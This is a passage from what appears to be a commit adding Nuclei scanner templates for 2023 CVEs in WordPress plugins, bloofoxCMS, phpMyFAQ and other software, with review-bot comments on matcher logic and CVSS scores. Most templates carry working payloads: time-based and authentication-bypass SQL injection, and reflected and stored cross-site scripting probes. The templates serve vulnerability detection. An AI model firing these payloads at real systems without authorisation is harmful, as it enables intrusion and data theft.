Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
action=backend_ajax&_action=copy_table&table_id=1+AND+(SELECT+2035+FROM+(SELECT(SLEEP(10)))A)&_wpnonce={{nonce}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'duration_3>=5'
- 'status_code_3 == 200'
- 'contains(body_3, "Security check")'
- 'contains(body_2, "ap-pricing-tables-lite")'
condition: and
extractors:
- type: regex
name: nonce
part: body
group: 1
regex:
- '_wpnonce=([0-9a-z]+)">Log Out'
internal: true
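
Review bot: The matcher 'duration_3>=5' is half of the injected delay, SLEEP(10), so a slow but unaffected admin-ajax.php response of five seconds would satisfy it. Raise the threshold to the sleep value. In classification, the vector uses PR:N and is scored 8.8, while the same vector is scored 9.8 elsewhere in this commit and the description says the injection needs a high-privilege user; the vector and score should be reconciled.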

View File

@ -0,0 +1,34 @@
id: CVE-2023-0947
info:
name: Flatpress < 1.3 - Path Traversal
author: r3Y3r53
severity: critical
description: |
Path Traversal in GitHub repository flatpressblog/flatpress prior to 1.3.
reference:
- https://huntr.dev/bounties/7379d702-72ff-4a5d-bc68-007290015496/
- https://nvd.nist.gov/vuln/detail/CVE-2023-0947
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-0947
cwe-id: CWE-22
metadata:
verified: true
shodan-query: http.favicon.hash:-1189292869
tags: cve,cve2023,lfi,flatpress,listing
http:
- method: GET
path:
- "{{BaseURL}}/fp-content/"
- "{{BaseURL}}/flatpress/fp-content/"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "<title>Index of /fp-content</title>")'
condition: and
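
Review bot: The matcher expects the exact title "Index of /fp-content", so the second path, /flatpress/fp-content/, can never match because its listing title would include the /flatpress prefix. Match on "Index of" together with "fp-content" instead. The check also detects an open directory listing rather than the path traversal named in the title and description; the description should say how the two relate. metadata has no max-request.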

View File

@ -0,0 +1,52 @@
id: CVE-2023-1263
info:
name: Coming Soon & Maintenance < 4.1.7 - Unauthenticated Post/Page Access
author: r3Y3r53
severity: medium
description: |
The plugin does not restrict access to published and non protected posts/pages when the maintenance mode is enabled, allowing unauthenticated users to access them.
reference:
- https://wpscan.com/vulnerability/2e07ffd9-8e82-4078-96aa-162ef78c417b
- https://nvd.nist.gov/vuln/detail/CVE-2023-1263
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cmp-coming-soon-maintenance/cmp-coming-soon-maintenance-plugin-by-niteothemes-416-information-exposure
- https://wordpress.org/plugins/cmp-coming-soon-maintenance/
remediation: Fixed in version 4.1.7
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2023-1263
cwe-id: CWE-862
metadata:
max-request: 1
verified: true
publicwww-query: "/wp-content/plugins/cmp-coming-soon-maintenance/"
tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,cmp-coming-soon-maintenance,unauth
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=cmp_get_post_detail&id=1
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"img":'
- '"date":'
- '"title":'
condition: and
- type: word
part: header
words:
- application/json
- type: status
status:
- 200

View File

@ -0,0 +1,44 @@
id: CVE-2023-1408
info:
name: Video List Manager <= 1.7 - SQL Injection
author: r3Y3r53
severity: critical
description: |
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.
reference:
- https://wpscan.com/vulnerability/baf7ef4d-b2ba-48e0-9c17-74fa27e0c15b
- https://wordpress.org/plugins/video-list-manager/
- https://nvd.nist.gov/vuln/detail/CVE-2023-1408
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2023-1408
cwe-id: CWE-89
metadata:
verified: true
tags: cve,cve2023,sqli,wordpress,wp-plugin,wp,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
@timeout: 15s
GET /wp-admin/admin.php?page=tnt_video_edit_page&videoID=SLEEP(7) HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
redirects: true
matchers:
- type: dsl
dsl:
- 'duration_2>=7'
- 'status_code_2 == 200'
- 'contains_all(body_2, "Edit Video","Youtube</option>")'
condition: and
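
Review bot: severity: critical and the PR:N vector do not agree with cvss-score: 8.8 or with the description, which says the injection is exploitable by high privilege users; the request sequence itself logs in first. Align severity, vector and score. metadata has no max-request, and the tags line has no plugin-specific tag.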

View File

@ -0,0 +1,44 @@
id: CVE-2023-1780
info:
name: Companion Sitemap Generator < 4.5.3 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The plugin does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
remediation: Fixed in version 4.5.3
reference:
- https://wpscan.com/vulnerability/8176308f-f210-4109-9c88-9372415dbed3
- https://nvd.nist.gov/vuln/detail/CVE-2023-1780
classification:
cve-id: CVE-2023-1780
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
metadata:
max-request: 2
verified: true
tags: cve,cve2023,wpscan,wp,wordpress,wp-scan,xss,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/tools.php?page=csg-sitemap&tabbed=%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "re not allowed to view")'
- 'contains(body_2, "<svg/onload=alert(document.domain)>")'
condition: and
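
Review bot: The tags line carries both wpscan and wp-scan and no tag for the plugin itself, unlike the other WordPress templates in this commit. Drop wp-scan and add the plugin slug so the template can be selected by plugin.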

View File

@ -0,0 +1,35 @@
id: CVE-2023-1880
info:
name: Phpmyfaq v3.1.11 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Phpmyfaq v3.1.11 is vulnerable to reflected XSS in send2friend because the 'artlang' parameter is not sanitized.
remediation: Fixed in 3.1.12 Version.
reference:
- https://huntr.dev/bounties/ece5f051-674e-4919-b998-594714910f9e
- https://nvd.nist.gov/vuln/detail/CVE-2023-1880
- https://github.com/thorsten/phpmyfaq/commit/bbc5d4aa4a4375c14e34dd9fcad2042066fe476d
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
metadata:
max-request: 1
verified: true
shodan-query: http.html:"phpmyfaq"
tags: cve,cve2023,xss,phpmyfaq
http:
- method: GET
path:
- "{{BaseURL}}/?action=send2friend&artlang=aaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "phpmyfaq") && contains(body, "<script>alert(document.domain)</script>")'
- 'contains(content_type, "text/html")'
condition: and

View File

@ -0,0 +1,56 @@
id: CVE-2023-2009
info:
name: Pretty Url <= 1.5.4 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Plugin does not sanitize and escape the URL field in the plugin settings, which could allow high-privilege users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
reference:
- https://wpscan.com/vulnerability/f7988a18-ba9d-4ead-82c8-30ea8223846f
- https://nvd.nist.gov/vuln/detail/CVE-2023-2009
- https://wordpress.org/plugins/pretty-url/
metadata:
verified: true
max-request: 3
tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,authenticated,pretty-url,xss
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log=((username))&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=prettyurls HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin.php?page=prettyurls HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dprettyurls&id=&category=accordions%7Epost_type&url=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&meta_title=&meta_description=&meta_keyword=
redirects: true
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(body_3, "<img src=x onerror=alert(document.domain)>")'
- 'contains(body_3, "prettyurls")'
condition: and
extractors:
- type: regex
internal: true
name: nonce
part: body
group: 1
regex:
- 'name="_wpnonce" value="([0-9a-z]+)" />'
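
Review bot: In the login request the body reads log=((username)), which is sent literally instead of being substituted; it should be log={{username}} as in the other authenticated templates. With the login failing, the nonce extractor and the third request have nothing to work with. The info block also has no classification section.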

View File

@ -0,0 +1,44 @@
id: CVE-2023-2779
info:
name: Super Socializer < 7.13.52 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
remediation: Fixed in version 7.13.52
reference:
- https://wpscan.com/vulnerability/fe9b7696-3b0e-42e2-9dbc-55167605f5c5
- https://nvd.nist.gov/vuln/detail/CVE-2023-2779
- https://wordpress.org/plugins/super-socializer/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
metadata:
verified: true
max-request: 2
publicwww-query: "/wp-content/plugins/super-socializer/"
tags: cve,cve2023,wpscan,xss,wp,wp-plugin,wordpress,authenticated,super-socializer
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://oast.pro HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(header_2, "text/html")'
- 'contains(body_2, "<img src=x onerror=alert(document.domain)>") && contains(body_2, "facebook_urls")'
condition: and

View File

@ -0,0 +1,38 @@
id: CVE-2023-27922
info:
name: Newsletter < 7.6.9 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The plugin does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as administrators
reference:
- https://wpscan.com/vulnerability/eb6ff6f0-60fe-4345-b443-97fd4800418c
- https://nvd.nist.gov/vuln/detail/CVE-2023-27922
metadata:
max-request: 1
verified: true
tags: cve,cve2023,wordpress,wp,wp-plugin,xss,newsletter,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=newsletter_system_status&a%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "text/html")'
- 'contains(tolower(body_2), "_newsletter_")'
- 'contains(body_2, "><script>alert(document_domain)</script>")'
condition: and
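
Review bot: Two of the dsl conditions cannot hold. 'contains(body_2, "text/html")' tests the body for a content type and should use content_type_2 or header_2, and the last condition looks for alert(document_domain) with an underscore while the request sends alert(document.domain). metadata also states max-request: 1 for a two-request template.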

View File

@ -0,0 +1,54 @@
id: CVE-2023-29439
info:
name: FooGallery plugin <= 2.2.35 - Cross-Site Scripting
author: theamanrawat
severity: medium
description: |
Reflected Cross-Site Scripting (XSS) vulnerability in FooPlugins FooGallery plugin <= 2.2.35 versions.
reference:
- https://lourcode.kr/posts/CVE-2023-29439-Analysis?_s_id=cve
- https://wordpress.org/plugins/foogallery/
- https://nvd.nist.gov/vuln/detail/CVE-2023-29439
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-29439
cwe-id: CWE-79
metadata:
verified: "true"
publicwww-query: "/wp-content/plugins/foogallery/"
max-request: 2
tags: cve,cve2023,xss,wordpress,wp-plugin,wp,foogallery,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/post-new.php?post_type=foogallery&post=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'data-gallery_id="\"><script>alert(document.domain)</script>"'
- 'foogallery-image-edit-modal'
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

View File

@ -0,0 +1,44 @@
id: CVE-2023-30868
info:
name: Tree Page View Plugin < 1.6.7 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7. This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.
reference:
- https://www.exploit-db.com/exploits/51507
- https://wpscan.com/vulnerability/407c62af-8e2d-441d-8332-0afad5d07014
- https://nvd.nist.gov/vuln/detail/CVE-2023-30868
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
cve-id: CVE-2023-30868
cpe: cpe:2.3:a:cms_tree_page_view_project:cms_tree_page_view:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
tags: cve,cve2023,xss,wp,wordpress,wpscan,authenticated,exploitdb
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E") && contains(body_2, "CMS Tree Page View")'
- 'status_code_2 == 200'
condition: and
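
Review bot: The body matcher looks for the payload in its URL-encoded form, %3Cscript%3E...%3C%2Fscript%3E, which is what a page that encodes the parameter correctly would also return, so this reports hosts where no script is injected. Match the decoded "><script>alert(document.domain)</script> instead, or explain why the encoded form proves execution. metadata states max-request: 1 for two requests.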

View File

@ -0,0 +1,43 @@
id: CVE-2023-3219
info:
name: EventON Lite < 2.1.2 - Arbitrary File Download
author: r3Y3r53
severity: medium
description: |
The plugin does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors
to access any Post (including unpublished or protected posts) content via the ics export functionality by providing the numeric id of the post.
remediation: Fixed in version 2.1.2
reference:
- https://wpscan.com/vulnerability/72d80887-0270-4987-9739-95b1a178c1fd
- https://nvd.nist.gov/vuln/detail/CVE-2023-3219
- https://packetstormsecurity.com/files/173992/WordPress-EventON-Calendar-4.4-Insecure-Direct-Object-Reference.html
- https://wordpress.org/plugins/eventon-lite/
metadata:
verified: true
max-request: 1
publicwww-query: "/wp-content/plugins/eventon-lite/"
tags: wpscan,cve,cve2023,wordpress,wp-plugin,wp,eventon-lite,bypass
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "BEGIN:VCALENDAR"
- "END:VCALENDAR"
condition: and
- type: word
part: header
words:
- "text/Calendar"
- type: status
status:
- 200
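
Review bot: The name says "Arbitrary File Download" but the description is about reading the content of any post through the ics export, so the name should describe post content disclosure. The info block has no classification section, and the header word "text/Calendar" is matched case-sensitively; adding case-insensitive: true to that matcher would avoid misses.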

View File

@ -0,0 +1,41 @@
id: CVE-2023-33584
info:
name: Enrollment System Project v1.0 - SQL Injection Authentication Bypass
author: r3Y3r53
severity: critical
description: |
Enrollment System Project V1.0, developed by Sourcecodester, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate the SQL queries executed by the application. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system.
reference:
- https://www.exploit-db.com/exploits/51501
- https://nvd.nist.gov/vuln/detail/CVE-2023-33584
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-33584
cwe-id: CWE-89
metadata:
verified: true
tags: cve,cve2023,sqli,exploitdb,unauth,enrollment
http:
- raw:
- |
POST /enrollment/ajax.php?action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username='+or+1%3D1+%23&password={{randstr}}
- |
GET /enrollment/index.php?page=home HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'contains(body_2, "Administrator") && contains(body_2, "Dashboard")'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and
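
Review bot: The dsl mixes body_2 with unsuffixed content_type and status_code, so it is not explicit which response the last two conditions refer to. Use content_type_2 and status_code_2 so that all three conditions describe the page fetched after the injected login. metadata has no max-request.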

View File

@ -0,0 +1,49 @@
id: CVE-2023-34751
info:
name: bloofoxCMS v0.5.2.1 - SQL Injection
author: theamanrawat
severity: critical
description: |
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the gid parameter at admin/index.php?mode=user&page=groups&action=edit.
reference:
- https://www.bloofox.com
- https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2023-34751
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-34751
cwe-id: CWE-89
metadata:
verified: "true"
fofa-query: "Powered by bloofoxCMS"
max-request: 2
tags: cve,cve2023,sqli,bloofox,authenticated
http:
- raw:
- |
POST /admin/index.php HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}&action=login
- |
@timeout: 10s
POST /admin/index.php?mode=user&page=groups&action=edit HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
name=User&backend=0&content=0&settings=0&permissions=0&tools=0&demo=0&gid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&name_old=User&send=Save
cookie-reuse: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- duration>=6
- contains(header_2, "text/html")
- contains(body_2, 'bloofoxCMS Admincenter')
condition: and
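
Review bot: 'duration>=6' is unsuffixed while the other two conditions use header_2 and body_2; write duration_2>=6 so the timing is tied to the injected request and not to the login. The raw request lines say HTTP/2 where the CVE-2023-34755 file uses HTTP/1.1, and verified is the string "true" rather than a boolean. The same three points apply to the CVE-2023-34752 and CVE-2023-34753 files.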

View File

@ -0,0 +1,49 @@
id: CVE-2023-34752
info:
name: bloofoxCMS v0.5.2.1 - SQL Injection
author: theamanrawat
severity: critical
description: |
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the lid parameter at admin/index.php?mode=settings&page=lang&action=edit.
reference:
- https://www.bloofox.com
- https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2023-34752
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-34752
cwe-id: CWE-89
metadata:
verified: "true"
fofa-query: "Powered by bloofoxCMS"
max-request: 2
tags: cve,cve2023,sqli,bloofox,authenticated
http:
- raw:
- |
POST /admin/index.php HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}&action=login
- |
@timeout: 10s
POST /admin/index.php?mode=settings&page=lang&action=edit HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
name=English&flag=en.gif&filename=english.php&date=m%2Fd%2FY&datetime=m%2Fd%2FY+-+H%3Ai&token=en&lid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save
cookie-reuse: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- duration>=6
- contains(header_2, "text/html")
- contains(body_2, 'bloofoxCMS Admincenter')
condition: and

View File

@ -0,0 +1,49 @@
id: CVE-2023-34753
info:
name: bloofoxCMS v0.5.2.1 - SQL Injection
author: theamanrawat
severity: critical
description: |
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the tid parameter at admin/index.php?mode=settings&page=tmpl&action=edit.
reference:
- https://www.bloofox.com
- https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2023-34753
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-34753
cwe-id: CWE-89
metadata:
verified: "true"
fofa-query: "Powered by bloofoxCMS"
max-request: 2
tags: cve,cve2023,sqli,bloofox,authenticated
http:
- raw:
- |
POST /admin/index.php HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}&action=login
- |
@timeout: 10s
POST /admin/index.php?mode=settings&page=tmpl&action=edit HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
name=default&template=default.html&css=default.css&template_print=print.html&template_print_css=print.css&template_login=login.html&template_text=text.html&be=0&tid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save
cookie-reuse: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- duration>=6
- contains(header_2, "text/html")
- contains(body_2, 'bloofoxCMS Admincenter')
condition: and

View File

@ -0,0 +1,49 @@
id: CVE-2023-34755
info:
name: bloofoxCMS v0.5.2.1 - SQL Injection
author: theamanrawat
severity: critical
description: |
bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the userid parameter at admin/index.php?mode=user&action=edit.
reference:
- https://www.bloofox.com
- https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2023-34755
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-34755
cwe-id: CWE-89
metadata:
verified: "true"
fofa-query: "Powered by bloofoxCMS"
max-request: 2
tags: cve,cve2023,sqli,bloofox,authenticated
http:
- raw:
- |
POST /admin/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}&action=login
- |
@timeout: 10s
POST /admin/index.php?mode=user&action=edit HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}&pwdconfirm=test&blocked=0&deleted=0&status=0&login_page=0&userid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save
cookie-reuse: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- duration>=6
- contains(header_2, "text/html")
- contains(body_2, 'bloofoxCMS Admincenter')
condition: and
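
Review bot: the second request is a Save on the user edit form and carries username={{username}}&password={{password}} with pwdconfirm=test, so a scan may write to a user record on the target instead of only probing it. Please confirm the request has no side effects when the injected userid matches no row, or drop the fields that are not needed to reach the userid parameter. The name also spells the product "bloofoxCMS" while the description uses "bloofox"; pick one.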

View File

@ -0,0 +1,50 @@
id: CVE-2023-34756
info:
name: Bloofox v0.5.2.1 - SQL Injection
author: theamanrawat
severity: critical
description: |
Bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the cid parameter at admin/index.php?mode=settings&page=charset&action=edit.
reference:
- https://ndmcyb.hashnode.dev/bloofox-v0521-was-discovered-to-contain-many-sql-injection-vulnerability
- https://www.bloofox.com
- https://nvd.nist.gov/vuln/detail/CVE-2023-34756
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-34756
cwe-id: CWE-89
metadata:
verified: true
fofa-query: "Powered by bloofoxCMS"
max-request: 2
tags: cve,cve2023,sqli,bloofox,authenticated
http:
- raw:
- |
POST /admin/index.php HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}&action=login
- |
@timeout: 10s
POST /admin/index.php?mode=settings&page=charset&action=edit HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
name=ISO-8859-1&description=&cid=2'+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save
cookie-reuse: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- duration>=6
- status_code == 200
- contains(header, "text/html")
- contains(body_2, 'Admincenter')
condition: and
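
Review bot: the matcher mixes unindexed status_code == 200 and contains(header, "text/html") with the indexed body_2 in a two-request template. Use status_code_2, header_2 and duration_2 so every condition is evaluated against the response to the injected request, not the login response. 'Admincenter' is also a weaker fingerprint than the 'bloofoxCMS Admincenter' string used by the other two bloofox templates.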

View File

@ -0,0 +1,32 @@
id: CVE-2023-36306
info:
name: Adiscon LogAnalyzer v.4.1.13 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
A Cross Site Scripting (XSS) vulnerability in Adiscon Aiscon LogAnalyzer through 4.1.13 allows a remote attacker to execute arbitrary code via the asktheoracle.php
reference:
- https://www.exploit-db.com/exploits/51643
- https://nvd.nist.gov/vuln/detail/CVE-2023-36306
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-36306
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,xss,unauth,exploitdb,adiscon,adiscon-loganalyzer
http:
- method: GET
path:
- "{{BaseURL}}/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "><script>alert(document.domain)</script>") && contains(body, "Adiscon LogAnalyzer")'
condition: and
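
Review bot: the description is cut off ("via the asktheoracle.php") and misspells the product as "Adiscon Aiscon LogAnalyzer"; it should name the affected parameter, which the request shows is uid. It also says "execute arbitrary code" for a reflected XSS; "inject arbitrary script" would be accurate. The path hardcodes the /loganalyzer/ prefix, so installs served from the web root will be missed, and metadata has no max-request.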

View File

@ -0,0 +1,49 @@
id: CVE-2023-37979
info:
name: Ninja Forms < 3.6.26 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin
remediation: Fixed in version 3.6.26
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-37979
- https://wpscan.com/vulnerability/3c7c65e9-c4fd-4d98-ae16-77abffbf7348
- https://packetstormsecurity.com/files/173983/WordPress-Ninja-Forms-3.6.25-Cross-Site-Scripting.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-37979
cwe-id: CWE-79
cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
publicwww-query: "/wp-content/plugins/ninja-forms/"
tags: cve,cve2023,xss,wordpress,wpscan,authenticated,wp-plugin,wp
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=nf_batch_process&batch_type=import_form_template&extraData%5Btemplate%5D=formtemplate-contactformd&method_override=_respond&data=Mehran%7D%7D%3Cimg+src%3Donerror%3Dalert%28document.domain%29%3E
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "<img src=onerror=alert(document.domain)>") && contains(body_2, "import_form_template")'
- 'status_code_2 == 200'
condition: and
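
Review bot: max-request: 1 does not match the two raw requests in this template; it should be 2. The matcher also only inspects the second response, so a failed login that still returns a page containing the reflected string and "import_form_template" would pass; consider adding a check on the first response. The payload is sent as src%3Donerror%3D with no separator between src and onerror, which is worth confirming against the referenced advisory.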

View File

@ -0,0 +1,31 @@
id: CVE-2023-3843
info:
